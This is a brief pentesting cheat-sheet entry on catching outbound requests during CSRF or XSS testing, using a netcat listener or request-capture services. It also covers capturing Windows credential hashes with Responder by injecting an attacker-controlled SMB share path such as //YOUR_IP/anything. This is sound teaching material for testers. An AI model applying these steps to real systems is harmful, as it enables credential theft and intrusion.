Request Grabber
During pentesting activies, we may want to catch HTTP requests, such as during a CSRF attack or a XSS attack.
If our machine is network accessible, we can use nc
:
$ nc -lnvp PORT
<send request to YOUR_PUBLIC_IP:PORT>
Otherwise, we may use online public solutions.
For instance, we can use API Testing Platforms:
- requestbin
- postbin
- ngrok
- ...
Additional tools
Responder
You can use responder to catch Windows authentication requests.
For instance, a website may be using SMB to access some shares based on the user input. If we inject a share leading to our machine, we may be able to grab credentials.
$ sudo responder -i IP -I tun0
In the previous example, if we inject //YOUR_IP/anything
. If the website was configured to use the current user credentials to connect to the share, then you will receive them, and will have to crack them.
π It works with SMB, LDAP, etc.